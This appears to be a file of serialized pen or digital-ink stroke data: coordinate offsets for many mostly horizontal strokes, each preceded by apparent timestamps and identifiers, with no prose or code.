37,-162-1,-128 18,146-17,-146 17,37-18,-91-17,-18-19,-91 36,-145-18,-36-18,-73 18,-54-18,-55 0,-18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46:21.5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18 7457,'18'0,"18"0,1 0,17 0,19 0,-1 0,37 0,0 0,54 0,1 0,-19 0,18 0,-18 0,0 0,-18 0,-54 0,-19 0,-17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0:46:23.0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01 10178,'36'0,"19"0,35 0,74 0,90 0,0 0,127 0,72 36,-17-36,-164 19,-36-19,-19 0,-17 0,-91 0,-19 0,-53 18,-19-18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2:06.9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95 10160,'18'18,"18"-18,1 0,35-18,1 0,17 0,1 18,36 0,-36 0,36 0,-36 0,17 0,1 0,18 0,-36 18,0-18,-19 18,19-18,-18 18,17-18,1 18,0-18,-37 0,1 18,-37-18,36 0,-36 0,19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31.5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466 7094,'19'0,"17"0,0-18,0 18,19 0,17 0,1 0,36 0,0 0,36 0,0 0,0 0,0 0,37 0,-37-18,36-1,55 19,-18 0,0-36,-1 36,19 0,0 0,-36 0,-19 0,0 0,-17 0,-19 36,-36-36,-73 0,18 0,19 0,-37 19,-18-19,1 0,-1 0,0 0,18 0,-54 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43.8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7 6241,'18'0,"0"0,19 0,-19 0,18 0,0 0,19 0,17 0,37 0,-18 0,0 0,18 0,18 0,-19 0,19 0,0 0,-36 0,-18 0,-19 0,1 0,-1 0,-36 0,18 0,1 0,-1 0,-18 0,0 0,19 0,-19 0,18 0,-18 0,0 0,19 0,-19 18,0-18,0 0,0 0,0 0,19 0,-1 0,-18 0,36 0,-35 0,17 0,0 0,-18 0,37 0,-19 0,-18 18,37-18,-37 0,18 0,-18 0,0 0,19 19,17-19,-18 0,19 0,-1 0,1 0,17 0,-54 0,19 0,-1 0,0 0,-18 0,0 0,1 0,17 0,-18 18,36 0,-17-18,17 0,-18 0,19 36,17-36,-17 0,-1 0,1 0,-19 0,-18 0,55 18,-19-18,1 0,17 0,-17 0,17 18,19-18,18 0,-55 0,19 0,17 19,-35-19,-1 0,37 0,-37 0,19 0,-19 0,1 18,17 0,1-18,18 0,-1 0,-17 0,0 0,-37 0,55 0,-37 0,-18 0,19 0,-1 0,19 0,-19 0,19 0,-19 0,1 0,17 0,-17 0,35 0,19 0,-36 0,54 0,-18 0,-1 0,-17 0,-18 0,-1 0,-17 0,-1 0,1 18,-1-18,-36 0,0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46.9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95 9017,'18'0,"0"0,0 0,19 0,-19-18,18 18,0 0,-17-18,17 18,18-18,1 18,17-37,1 37,72 0,0 0,18 0,1 0,35 0,37 18,36-18,-36 0,0 0,18 0,0 0,18 0,-36 0,-18 0,36 0,0 0,-55 0,19 0,0 37,-37-37,-18 0,-17 18,-19-18,-37 0,1 0,-18 0,-37 0,18 0,-17 0,-1 0,0 0,0 0,1 0,-19 0,0 0,0 0,0 0,0 0,19 0,-19 0,0 0,0 0,18 0,55 0,0 0,36 18,0-18,0 18,18-18,0 0,-18 0,18 18,0-18,19 0,-1 0,18 0,-17 0,-37 0,-18 0,18 0,-55 0,37 0,-55 0,-17 0,-19 18,18-18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5:31.4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886 10248 0,'0'-17'125,"53"-1"-109,17 18 0,-34 0-16,17 0 15,-1 0-15,-16 0 16,-1 0-16,0 0 16,-17 0-16,0 0 15,17 0-15,0 0 16,-17 0-1,35 0-15,-36 0 16,36 0 0,18 0-16,-18 0 15,-36 0-15,19 0 16,-19 0-16,1 0 16,-1 0-16,1 0 15,0 18 1,17-18-16,-35 17 15,18-17-15,-1 0 16,19 0-16,-19 0 16,1 0-16,0 0 15,-1 35 32,1-35-47,-1 0 16,19 0-16,17 0 15,-18 0-15,18 0 16,-36 0-16,1 0 16,0 0-16,-1 0 31,1 0-31,0 0 16,-1 0-1,1 0-15,0 0 16,-1 0 156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48.0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376 10795,'0'0,"18"0,0 0,0-18,18 18,-17 0,35 0,19-18,72 18,-18 0,36-18,18 18,1 0,36 0,-1 0,55 0,-54 0,18 18,-18-18,18 0,-19 0,55 0,-72 0,-19 0,-17 0,-37 0,-37 0,-17 0,-19 0,-35 0,17 0,-18 0,18 0,37 0,36 0,36-18,54-37,110 19,-91 18,-1 0,-72 18,-18 0,19 0,-1 0,0 0,-54 0,17 0,-53 0,-37 0,0 0,-54-19,-19 1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32.3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254 4427,'18'0,"55"0,54 18,18 18,54-36,37 18,18 1,91 17,18-18,0 36,0-54,36 19,-163-19,18 0,-37 18,-108-18,0 0,-91 18,0-18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36.1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17 5842,'18'0,"0"0,0 0,19 0,-1 18,18-18,19 18,54-18,0 0,18 0,18 0,-18 0,55 0,-19 0,1 0,36 0,-1 0,-35 18,-1-18,-18 0,-17 19,-1-1,0-18,-18 0,0 18,-18 0,-19-18,19 18,-36 0,18-18,-1 37,1-19,-37-18,55 0,-54 0,-1 0,1 0,17 18,-36 0,1-18,17 0,-36 0,19 18,-1-18,-18 0,0 0,18 0,1 0,17 0,1 0,-1 0,0 0,37 0,-18 0,54 0,-18 0,-1 18,19-18,-36 0,18 0,-36 0,17 0,19 0,-18 0,54 0,-36 0,-37 0,19 0,-36 0,17 0,1 0,-1 0,-17 0,-1 0,1 0,-19 0,-18 0,0 0,18 0,-36-18,19 18,-1 0,18 0,-18 18,-36-18,0 0,0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48.5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28 8926,'18'-18,"19"18,17 0,19 0,36 0,-1 0,19 0,19 0,35 18,-36-18,-36 0,18 0,-54 0,-1 18,-17-18,-37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50.6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56 8963,'37'0,"-1"0,18-19,19 19,18 0,54 0,0 0,18 0,-54-18,91 18,-19 0,0 0,-17 0,-19 0,-18 0,18 0,-54 0,36 0,-55 0,-17 0,17 0,1 0,-1 0,1 0,18 18,-19-18,1 0,-1 19,-17-19,36 0,17 0,-17 0,18 0,0 0,0 0,-19 0,19 0,-18 0,-37 18,73-18,-72 0,-1 0,19 0,-37 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,37 0,-1 0,1 0,-1 0,-18 0,19 0,-19 0,18 0,1 0,17 0,19 18,54-18,-18 18,-18 0,36-18,-18 0,-18 0,36 0,-54 0,-18 18,-19-18,-18 0,1 0,-19 0,36 0,1 0,-37 0,18 0,-18 0,37 0,-19 0,-18 0,0 0,0 0,0 0,37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54.6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064 9017,'0'-18,"18"18,0 0,37 18,-1-18,1 0,72-18,-37 18,74 0,-19 0,0 0,54 0,-35 0,53 0,1 0,0 0,18 0,-19 0,1 0,-18 0,-37 0,-18 18,-18-18,-72 0,-1 18,0-18,-17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56.0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02 10069,'36'0,"0"0,1 0,17 0,19-18,-1 18,-17 0,17 0,-17 0,-37 0,36-18,-18 18,-17 0,-1 0,0 0,0 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6:59.0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38 12809,'18'18,"0"-18,36 0,1 0,35 0,19 0,36 0,1 0,53 0,-36 0,19 0,-37 0,18 0,-36 0,-36 0,18 0,-37 0,-17 0,-19 18,19-18,-37 0,0 0,0 0,18 0,19 0,-19 0,37 0,-1-18,1 18,36-18,-19 18,55 0,55 0,-37 0,37 0,-37 0,55 0,-37 0,1 0,17 0,37 0,0 0,-55 18,1-18,90 0,-54 0,-55 0,-18 0,18 0,19 0,-73 0,0 0,-19 0,-35 0,-19 0,0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03.8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00 14079,'0'-18,"18"18,0 0,0 0,0-18,19-1,17 19,1 0,-1-18,0 18,1 0,-1 0,-17 0,17 0,-18 0,19 0,17 0,1 0,54 0,-36 0,54 0,-36 0,36 0,0 0,18 0,-36 0,18 0,0 0,-18 0,19 0,-38 0,38 0,-19 0,18 0,-18 0,-18 18,-19-18,1 0,-18 0,-19 0,-18 0,-18 0,1 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06.4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67 13970,'18'0,"18"0,0 0,37 0,36 0,-18 0,54 0,0 0,-18 0,36 0,-18 0,0 0,1 0,-1 0,-18 0,18 0,-18 0,-36 0,17 0,-17 0,-55 0,37 0,-19 0,-17 0,17 0,1 0,-19 0,0 0,0 0,-17 0,17 0,-18 0,0 0,0 0,0 0,1 0,17 0,-18 0,0 0,0 0,19 0,-1 0,0 0,-18 0,19 0,-19 0,0 0,0 0,0 0,18 0,19 0,-1 0,19 0,-1 0,-17 0,-1 0,1 0,-1 0,-18 0,1 0,-1 0,-18 0,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5:32.6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591 11254 0,'18'0'47,"0"0"-31,17 0-16,0 0 15,-17 0-15,70 0 16,-17 0-16,-1 0 16,18 0-16,-35 0 15,-17 0-15,16 0 16,-16 17-16,-19-17 16,1 0-16,17 0 15,-17 0 1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07.4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679 14079,'0'-18,"18"18,0 0,0 0,18 0,37 0,18 0,18 0,-1 0,38 0,35 0,-72 0,36 0,-36 0,-55 0,-17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09.1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65 15059,'0'0,"18"0,0 0,0 0,1 0,17 0,0 0,19 0,-1 0,19 0,35 0,1 0,36 0,1 0,-19 0,0 0,-19 0,19 0,-54 0,-37 0,-18 0,1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11.9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57 15222,'18'0,"18"0,-17 0,35 0,0 0,1 18,-1-18,37 0,-18 0,-19 0,0 0,1 0,-19 0,0 0,1 0,-19 0,0 0,0 0,0 0,0 0,1 0,-1 0,18 0,18 0,19 0,0 0,-1 0,19 0,0 0,-1 0,-35 0,35 18,-53 0,-19-18,0 0,0 0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13.0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851 15186,'18'-19,"18"19,0 0,19 0,17 0,-17 0,17 0,19 0,36 0,-18 0,0 0,-37 0,37 0,-18 0,18 0,-19 0,1 0,-18 0,-1 19,-17-19,-1 18,1-18,-19 0,0 0,19 18,-19-18,-18 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,18 0,1 0,-1 0,0 0,19 0,-1 0,1 0,17 0,-17 0,-1 0,-18 18,1-18,-19 0,0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16.8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624 15113,'18'0,"37"0,54 0,18 0,36 0,0 0,37 0,-55 0,0 0,-18 0,-36 0,-19 0,-17 0,-37 0,-36 0,0 0,0 18,-1-18,1 18,0-18,0 18,0-18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18.8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8 16419,'18'0,"0"0,18 0,-18 0,37 0,17-18,1 18,-1-18,37-18,36 36,-36-18,36 18,1 0,-38 0,38 0,-19 0,72 0,-72 0,55 18,-37-18,36 36,-36-18,-18-18,18 36,-18-36,-36 0,36 0,-36 0,36 0,-55 0,37 0,-18 0,-18 0,-1 0,-17 0,-1 0,0 0,-17 0,17 0,-36 0,19 0,-19 0,36 0,-18-18,1 18,-19 0,18-18,19 18,-19-18,-18 0,18 18,-18 0,1 0,-1 0,0 0,18 0,-18 0,0 0,1 0,-1 0,0 0,-18 18,18-18,0-18,18 18,-17 0,-1 0,0 0,0 0,0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32.3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91 10196,'18'0,"36"0,37 0,72 37,-36-19,18-18,-72 0,-1 0,-17 0,-1 0,-17 0,-1 0,-18 0,0 0,0 0,0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33.1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18 10178,'18'0,"19"0,-1 0,18 0,1 0,-19 0,37 0,-19 0,37 0,-19 0,1 0,18 0,-19 0,1 0,-19 0,1 0,-37 0,0 0,0 0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34.4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655 10251,'18'0,"-18"-18,19 18,-1 0,0 0,0 0,55 0,-19 0,37 0,36 0,18 0,0 0,18 0,19 0,-19-19,-18 19,-18 0,36 0,-54 0,-36 0,-37 0,-18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37.0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338 10305,'18'0,"1"0,-1 0,18 0,0 0,19 18,-1-18,1 0,53 0,-17 0,36 0,0 0,18 0,0 0,1 0,-38 0,-17 0,0-18,18 18,-55-36,1 36,-19 0,-18 0,0 0,-18-18,18 18,0 0,1 0,-1 0,36 0,-18 0,1-18,-1 18,18 0,-17 0,17 0,1 0,-1 0,0 0,-17 0,-1 0,37 0,-19 0,0 0,-17 0,-1 0,0 0,1 0,-19 0,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2:30.1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57 5534,'19'0,"-1"0,18 18,0-18,1 0,-19 0,0 0,18 0,55 0,18 0,18 0,18 0,-36 0,36 0,-18 0,-36 0,17 0,-17 0,-36 0,-19 0,0 18,-18-18,0 0,1 18,17-18,0 0,0 0,37 0,-19 0,19 0,-19 0,19 0,0 0,-19 0,37 0,-37 0,1 0,-1 0,0 0,-17 0,-1 0,0 0,-18 0,1 0,-1 0,0 0,18 0,0 0,-17 0,35 0,-36 0,18 0,19 0,-19 0,0 18,-17-18,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5:34.3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51 12435 0,'123'0'79,"89"0"-64,52-35-15,160 35 16,70-35-16,-1 17 15,-52 18-15,-194 0 16,-53 0-16,-53 0 16,-105 0-16,-19 0 15,1 0-15,35 0 141,70 0-141,18 0 16,54 0-16,-1 0 0,-18 0 15,-17 0 1,17 0-16,-52 0 15,-54 0-15,-52 0 16,-1 0 125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07:38.2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74 11503,'0'-19,"18"19,0 0,0 0,19 0,-1-18,36 18,-17-18,36 0,-19 18,55-18,18 18,-18 0,0 0,-72 0,-37 0,0 0,0-18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32.7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13 7058,'18'0,"0"0,0 0,1 0,35 0,-18-19,1 1,-1 18,18 0,1 0,-1 0,-18-18,1 18,35 0,19 0,-18 0,35 0,19 0,55 0,-37 18,55 0,-37 19,0-37,37 0,-19 36,-36-18,19-18,-19 18,36-18,-36 18,-36-18,0 0,-36 0,17 0,-35 0,-1 0,-18 19,1-19,-19 0,0 0,0 0,0 0,0 0,1 0,17 0,-18 0,0 0,37 0,-37 0,36 0,-18 0,37 0,0 18,17-18,-17 0,18 0,-19 0,1 0,36 0,-19 0,-35 0,17 0,-17 0,17 0,-17 0,-1 0,1 0,-1 0,0 0,1 0,36 0,-1 0,-17 0,-19 0,19 0,-19 0,1 0,17 18,-17-18,17 0,-35 0,-1 0,18 0,-17 18,-1-18,0 0,0 0,1 0,-19 0,18 0,-18 18,0-18,1 0,17 0,-18 0,0 0,18 0,-17 0,-1 0,0 0,0 0,18 0,-18 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,18 0,-18 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0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36.4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40 8128,'19'0,"17"0,18 0,-17 0,35 0,-17 0,17 0,1 0,17 0,37 0,-54 0,54 0,-36 0,18 0,-19 0,37 0,0 0,18 0,-36 0,36 0,1 0,-19 0,0 0,-37 0,37 0,0 0,0 0,-18 0,18 0,0 0,-36 18,36-18,-18 0,0 0,-19 18,19-18,0 0,-18 0,18 0,-37 0,19 18,0-18,-1 0,-35 0,-1 0,1 0,-1 0,-18 0,37 0,-19 0,19 0,-1 0,19 0,0 19,-19-19,-17 0,36 0,-37 18,0-18,55 18,-54 0,17-18,-17 0,17 0,-17 0,17 0,-17 0,-1 0,19 0,-19 0,1 0,-1 0,0 0,-17 0,17 0,1 0,-1 0,0 0,1 0,-19 0,19 0,-19 0,0 0,0 0,1 0,-19 0,18 0,-18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52.3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36 5951,'37'0,"-1"18,0-18,19 0,-1 0,1 0,-1 0,19 0,-19 0,0 36,1-36,-19 0,0 0,1 0,-1 0,18 0,-17 18,-19-18,18 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,18 0,-17-18,-1 18,0 0,36 0,-36 0,1 0,17 0,0 0,-18 0,19-18,-19 18,36 0,1 0,17 0,19 18,-19-18,-17 0,17 0,1 0,18 0,18 0,18 18,-37-18,37 19,0-19,-36 0,18 0,-18 0,-19 0,-17 18,17-18,-17 0,-19 0,0 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,19 0,-1 0,18 0,-17 0,35 0,-17 0,17 0,1 0,54 0,-37 0,19 0,-18 0,18 0,-18 0,-37 0,0 0,1 0,-1 0,-17 0,-1 0,0 0,0 0,1 0,-1 0,0 0,-18 0,1 0,-1 0,18 0,-18 0,0 0,0 0,1 0,-1 18,18-18,-18 0,0 0,0 0,19 0,-19 0,0 0,0 0,0 0,0 0,1 0,-1 0,0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53.5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74 5969,'36'0,"1"0,-19 0,54-18,1 18,-19-18,55 18,-18 0,18 0,-37 0,19 0,-18 0,36 0,-1 0,-17 0,-36 0,17 0,-36 0,19 0,17 0,-17 0,-1 0,-36 18,1-18,-38 0,-35 0,0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55.9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50 8436,'18'0,"0"0,18 0,-18 0,0-18,19 18,-1 0,0 0,1 0,17 0,0 0,19 0,0 0,17 0,1 0,-18 0,17 0,19 0,-36 0,17 0,19 0,0 0,0 0,18 0,-54 0,-1 0,19 0,18 0,-37 0,37 0,-18 0,18 0,36 0,-36 0,36 0,-18 0,18 0,0 0,0 0,0 0,1 0,-1 0,0 0,36 0,-90 18,54-18,0 0,0 0,1 0,-1 19,-18-19,0 0,0 0,-18 0,-1 0,1 0,18 0,18 18,-18-18,0 0,19 0,-1 0,0 0,0 0,0 0,-18 0,-36 0,0 0,36 0,0 0,0 0,-37 0,19 0,0 0,0 0,-18 0,36 0,-55 0,-17 0,35 0,-35 0,-1 0,1 0,-19 18,0-18,0 0,19 0,-19 0,37 0,-37 18,0-18,1 0,-19 0,36 0,-36 0,0 0,1 0,17 0,-18 0,18 0,1 0,17 0,0 0,19 0,-37 0,19 0,-19 0,37 0,-19 0,19 0,-19 0,-36 0,0 0,0 0,1 0,17 0,-18 0,0 0,0 0,0 0,19 0,-74 0,19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0:58.1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01 7910,'0'0,"0"37,-18-19,18 0,0 18,0 0,0 1,0-1,0 0,-36 1,36 17,0 0,0 1,0-1,0-36,0 1,0-1,0 0,-19-18,19 18,0 0,0 0,0 0,0 19,19-19,-19 0,54 18,-36-18,0-18,0 19,1-19,-1 0,0 0,18 0,0 18,37-18,0 0,-1 0,-17 0,-1 0,-18 0,19 0,-19 0,18 0,-17 0,-19 0,0 0,-18-18,0-1,0 1,0-18,0 18,0 0,0-19,0 1,0-18,0 17,0 1,0-18,0 17,0 19,0 0,0-18,0 18,0-19,0 1,0 0,0 18,-18 0,18-1,0 1,0 0,-18 18,0 0,-19 0,1 0,18 0,0 0,-19 0,1-18,-18 18,-19 0,37 0,-19-18,19 18,0 0,0-18,-1 18,19-18,0 18,0 0,0 0,0 0,-19-19,19 19,-18 0,18 0,0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3.6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60 5896,'0'-18,"18"18,0 0,36 0,1 0,17 0,37 0,18 0,-36 0,0 0,36 0,-19 0,-17 0,-18 0,-1 0,37 0,-18-18,-19 18,-17 0,36 0,-37 0,0 0,19 0,-19 0,1 0,-19 0,-18 0,0 0,1 0,-1 0,18 0,-18 0,0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4.8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467 5969,'0'0,"0"-18,19 18,-1 0,36 0,1 0,-1 0,37 0,36 0,0 0,-37 0,19 0,0 18,18-18,0 18,0-18,-36 0,36 0,-55 0,1 0,-19 0,-17 0,-1 0,-18 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 18,37-18,-37 0,0 0,18 18,-17-18,-1 0,0 0,0 0,-18 19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6.7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904 8400,'0'0,"18"18,18-18,-17 0,35 0,19 0,17 0,19 0,18 0,-18 0,36 0,0 0,37 0,-19 0,37 0,35 0,-17 18,0-18,18 0,0 19,-19-19,19 0,18 0,-18 0,0 0,0 18,18 0,-37-18,-53 0,72 36,-73-18,18-18,19 0,-37 0,37 0,-19 0,19 0,-1 0,-17-18,-19 18,37 0,-19 0,-36 0,0 0,-18 0,37 0,-19 0,0 0,54 0,-35 0,-1 0,-36 0,18 0,0 0,-18 0,0 0,-18 0,0 0,-36 0,17 0,-35 0,-19 0,18 0,-17 0,-19 0,0 0,18 0,-18 0,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29:51.8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200 5258 0,'0'20'78,"20"-20"-31,0 0-32,0 0 1,0 0-16,19 0 16,1 0-1,0 0-15,19 0 16,-19 0-16,20 0 15,-21 0-15,-19 0 16,20 0-16,-1 0 16,1 0-16,-20 0 15,0 0-15,0 0 16,-1 0 31,1 0 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7.6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73 9561,'18'0,"18"0,-18 0,55 0,54 0,54 0,37 0,127-18,144 18,110-36,145 36,-36-55,17 55,-162-36,35 36,-53 0,-291 0,-18 0,-55 0,-36 0,-109 0,-36 18,-36-18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8.4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91 10033,'36'0,"-18"0,18 0,19 0,36 0,54 0,18 0,55 0,126 0,92 0,108 0,0 0,1 0,-1 0,-145 0,-163 18,-91-18,-109 0,-17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11:09.5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04 9289,'0'0,"19"0,-1 0,0 0,18 0,37 0,54 0,-18 0,108 0,1 0,72 0,128 18,17-18,73 0,-18 18,18-18,36 0,0 0,91 37,19-37,35 0,146 0,-37 36,-109 0,-144-36,53 0,-53 0,-19 0,-127 0,-91 0,-54-18,-54 18,-55 0,-72 0,-1 0,-36 0,-17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57.0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04 4336,'36'0,"-18"0,19 0,35 0,37 18,18-18,18 0,37 0,72 0,-37 0,19 0,18 0,-36 0,-73 0,0 0,-36 0,-55 0,-35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58.2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19 5969,'19'0,"35"0,-18 0,37-18,36 18,54-18,18 0,1 18,54 0,18 0,-18 0,54 0,18 0,110 54,71 37,-89-73,-56-18,19 36,-91-18,-36-18,-73 0,19 0,-37 18,-54-18,-37 19,-18-19,-54 0,0 0,0 0,0 0,0 0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59.3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70 5969,'18'0,"19"0,-19 0,0 0,36 0,1 0,36 0,-1 0,37 0,0 0,-36 0,36 0,-18 0,18 0,18 0,36 0,-35 0,-1 0,18 0,-18 36,37-18,-74-18,1 0,-18 0,18 0,-18 0,-19 0,19 0,-55 19,0-19,1 0,-19 0,18 0,-18 0,19 0,-19 0,18 18,18 0,-35-18,17 0,-18 0,0 0,18 0,1 0,17 0,-36 0,19 0,-1 18,0-18,19 18,-37-18,0 0,0 0,0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40.7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73 1887,'18'0,"19"0,-1 0,37 0,-1 0,55 0,18 0,0 0,1 18,-1 0,0-18,36 0,-36 18,73-18,-73 0,19 0,-1 18,-18-18,-18 19,0-1,-36 0,-55-18,-18 0,0 0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42.6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85 4336,'18'0,"18"0,1 0,53 0,-17 0,54 0,36 0,0 0,91 0,-36 36,18 1,0-19,18 0,0-18,18 0,-54 0,-1 0,1 0,-36 0,-1 0,-72 18,18 0,-18-18,18 18,-37-18,-17 0,-37 0,19 0,-1 0,-18 0,-17 0,35 19,-36-19,0 0,0 0,1 0,-1 0,18 0,-18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45.4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36 4318,'0'0,"73"0,-1 0,19 0,18 18,0-18,-19 18,56-18,-19 0,18 18,-18 1,18-19,0 0,36 0,-17-19,-19 19,18-18,19 18,-1 0,0 0,-17 0,-1 0,55 0,-37 0,1 0,-1 0,0 0,19 0,0 18,35 1,1 17,18-18,-36 0,-37-18,1 36,17-17,-17-19,36 0,-19 36,-17 0,-37-36,0 18,0 0,-36-18,-37 19,1-1,-19-18,1 18,-1-18,-17 0,-1 0,-18 0,0 0,18 0,-17 0,17 18,-18-18,18 0,-18 0,1 0,-1 0,0 0,0 0,0 0,18 0,-17 0,17 0,0 0,0 0,19 0,-19 0,55 0,-19 0,1 0,-19 0,1 0,36 0,-19 0,19 0,-37 0,19-18,36 18,-37 0,19 0,0 0,-19 0,1 0,-1 0,19 0,0 0,0 0,-37 0,37 0,-19 0,1 0,-37 0,19 0,-1 0,-36 0,0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18.3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92 15603,'36'0,"18"0,1 0,17 0,19 0,36 0,18 0,18 0,37 0,36 0,54 0,-54 0,72 0,-17 0,53 0,128-36,-73 17,0 19,-90 0,72 73,-18-55,-55 18,55-36,-109 0,-18 0,72 19,-72-19,-18 0,-55 18,19 0,-55-18,-37 0,-35 18,-19-18,0 0,-18 0,1 0,17-18,0 0,19 18,-1-18,55 18,-37 0,74 0,-19-19,-19 1,19 0,19 18,-19 0,-55 0,-17 0,-19 0,0 0,-18-18,-18 0,0 0,-18 0,0-1,-55-17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29:55.9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25 5953 0,'20'0'0,"0"0"31,40 0-31,19 0 16,60 0-1,40 0-15,39 0 16,20 0-16,0 59 16,-39-39-16,-21 0 15,-39 40-15,-79-60 16,-60 19-16,0-38 125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20.2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13 6005,'0'0,"55"0,72 0,-55 0,37 18,-55-18,-17 0,-1 19,0-19,1 18,-19-18,0 0,0 0,18 0,-18 0,19 0,-1 0,-18 0,0 0,0 0,19 18,-19-18,0 0,55 36,-19-36,19 0,-1 0,1 0,54 0,-37 0,1 0,36 18,0 0,-54 1,17-19,-35 0,-1 0,1 0,-37 0,18 0,0 0,19 18,-19 0,-18-18,19 0,-19 0,18 0,-18 0,0 0,0 0,1 0,17 0,-18 0,18 0,-18 0,1 0,-19 18,36-18,0 0,19 18,-1-18,0 0,19 0,0 0,-19 0,0 0,1 0,-19 0,37 0,-55 0,36 0,-17 0,-19 0,36 0,-18 0,1 0,17 0,-36 0,19 0,-19 18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21.2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79 6332,'0'-18,"37"18,-1 0,0 0,19 0,35 0,1 0,36 0,0 0,36 0,-18 0,19 0,17 0,-18 0,1 0,17 0,-36 0,19 18,17 0,19 36,-55-54,18 19,-18-1,37-18,-74 18,19-18,-18 0,-54 0,-1 0,-36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24.1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27 7765,'55'0,"-1"0,19 0,-1 0,37 0,18 0,18-18,37 18,-1 0,1 0,-19 0,37 0,-19 0,-36 0,-18 0,73 0,-91 0,18 0,0 0,-55 0,19 0,-19 0,37 0,-54 0,-1 0,-18 0,-17 0,17 0,0 0,0 0,-17 0,-1 0,0 0,0-18,0 18,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,18 0,-18 0,18 0,19 0,-1 0,-36 0,37 0,17 0,1 18,0-18,35 0,19 0,-36 0,36 0,-36 0,36 0,-36 0,36 0,0 0,-37 18,19-18,-18 0,-19 0,-35 0,17 0,-36 0,0 0,1 0,-1 0,18 0,18 0,-35 0,53 0,-17 0,17 0,1 0,-1 0,19 0,18 0,-18 0,36 0,0 0,-19 0,19 18,0-18,19 0,-38 0,1 18,18-18,0 0,0 0,-18 0,18 0,0 0,0 0,0 0,-18 0,18 0,0 0,-18 0,0 0,18 0,-37 19,37-1,0-18,-54 0,54 0,-73 0,19 0,-37 0,-18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25.2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44 9017,'18'0,"1"0,-1 0,36 0,19-18,54 18,18-18,18 18,55 0,54-18,91 18,-91-55,182 55,35 0,56 0,53 0,-53 0,-1 0,37 0,-19-18,37-18,-55 36,0-18,55 18,-55 0,55 0,-73 0,-72 0,-110 0,-71 0,-19 0,18-37,-18 19,-37 18,56 0,-38 0,-17 0,-18 18,-1-18,-17 0,-37 0,0 0,-36 0,-18 0,-1 0,-35 0,17 0,-17 0,-1 0,-36 0,0 0,1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1:38:30.9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30 4336,'0'18,"37"-18,-1 0,37 0,-1 0,55 0,0 0,55 0,-1 0,73 0,36 0,218 0,37 0,-1 0,-18 0,182 37,-55-1,0 0,36-36,-108 0,-91 0,54 0,-199 0,-73 0,-54 18,-73 0,0-18,-54 19,-55-19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07.1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75 14260,'18'0,"18"0,19 0,36 0,-1 0,19 0,-18 0,36 0,0 0,-36 0,-19 0,37 0,-55 0,1 0,-19 0,0 0,-17 0,-1 0,0 0,0 0,18 0,19 0,-1 0,55 0,0 0,54 0,0 0,55 0,36 0,-18 0,0 0,127 18,-55-18,-18 0,-90 0,-73 0,91 0,-55 37,37-19,-73-18,0 18,-19-18,-17 0,-18 0,-19 0,-36 0,0 0,1 0,-19 18,18-18,0 0,18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9:08.5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97 15331,'55'0,"36"0,54 0,36 0,-18 0,73 0,18-18,0 18,73 0,145 0,-37 0,109 0,91 0,-90 0,-1 0,0 0,0 0,55 36,-145-36,-1 18,-54-18,-90 36,-37-36,-72 0,-19 18,-18-18,-36 0,-36 0,-37 0,-17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8:56.4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835 14315,'0'-18,"18"18,18 0,18 0,1 0,36 0,17 0,1 0,36 0,37 0,-19 0,0 0,37 0,-37 0,19 0,-37 0,0 0,18 0,-18 0,-36 18,-18-18,-18 0,-19 0,-18 0,-36 18,18-18,1 0,-1 0,0 0,0 0,18 0,-18 0,19 0,-1 0,0 0,1 0,17 0,-18 0,-18 0,1 0,-1 0,18 0,-36 18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08:59.1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37 16383,'19'0,"-1"0,0 0,18 0,-18 0,55 0,-37 0,19 0,35 18,19-18,-36 0,36 0,-19 0,-17 0,-19 0,-17 0,-19 0,0 0,0 0,36 0,19 0,0 0,17 0,74 0,-19 0,0 0,18 0,0 0,19 0,-1 0,-17 0,35 0,-17 0,53 0,-53 0,-37 0,73 0,-19 0,1 18,-37-18,0 0,19 0,-1 0,19 0,-37 0,-36 0,36 0,1 0,-19 0,0 0,0 0,-36 0,36 0,-18 0,36 0,-36 0,0 0,19 0,-19 0,-19 0,1 0,-36 0,18 0,17 0,-53 0,-1 0,1 0,-1 0,1 0,-19 0,18 0,19 0,-19 0,1 0,-1 0,1 0,17 0,1 0,17 0,19 0,-18 0,18 0,-18 0,36 0,-37 0,19 0,0 0,18 18,0-18,0 0,-36 0,36 0,-37 0,19 0,-36 0,-19 0,1 0,-1 0,-18 0,37 0,-19 0,1 0,36 0,-37 0,37 0,-37 0,1 0,-37 0,54 0,-35 19,-19-19,0 0,0 0,-54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01.7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00 3988 0,'19'0'31,"1"0"-15,20 0-1,19 0-15,61 0 16,18 0-16,61 0 16,19 0-16,20 0 15,-19 0-15,-61 0 16,-39 0-16,40 0 15,-20 0-15,20 0 16,-20 0-16,19 0 16,-58 0-16,19 0 15,-60 0-15,-39 0 16,40 0-16,-1 0 16,-39 0-16,20 0 15,-20 0-15,-1 0 16,1 0-16,40 0 15,-21 0-15,1 0 16,-20 0 0,39 0-16,-39 0 0,40 0 15,-40 0 1,0 0-16,-1 0 16,1 0-1,0 0 1,0 0-1,0 0-15,39 0 16,1 0-16,-21 0 16,-19 0-1,0 0 1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03.0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47 4346 0,'0'0'0,"40"0"15,-1 0-15,1 19 16,19 1-16,-19 0 16,79 0-16,-20 20 15,20-21-15,100-19 16,39 0-16,-159 0 15,159 0-15,-40 0 16,0 0-16,-59 0 16,-79 0-16,-21 0 15,-39 0-15,0 0 16,0 0-16,0 0 16,-1 0-16,1 0 15,0 0-15,0 0 16,20 0-16,-21 0 15,1 0 1,0 0-16,0 0 16,0 0 62,-20 20-31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04.0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89 4564 0,'39'0'32,"1"0"-17,20 0-15,-21 0 16,41 0-16,59 0 16,19 0-16,21 0 15,39 0-15,20 0 16,-19 0-1,-21 0-15,-39 0 16,-20 0-16,-100 0 16,21 0-16,-20 0 15,-21 0-15,1 0 16,0-20-16,0 20 16,0-20-16,0 20 15,0 0-15,-1 0 16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13.7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30 5913 0,'20'0'94,"59"0"-79,-39 0-15,59 0 16,60 0-16,19 0 16,1 0-16,-21 0 15,41 0-15,-20 0 16,-60 0-16,20 0 16,19 0-16,1 0 15,0 0-15,-1 0 16,41 20-16,-40 0 15,19 20-15,-39-1 16,-20-19-16,-79-20 16,19 20-1,-19 0-15,20 0 16,-40-20-16,19 19 16,-19-19-16,0 0 15,0 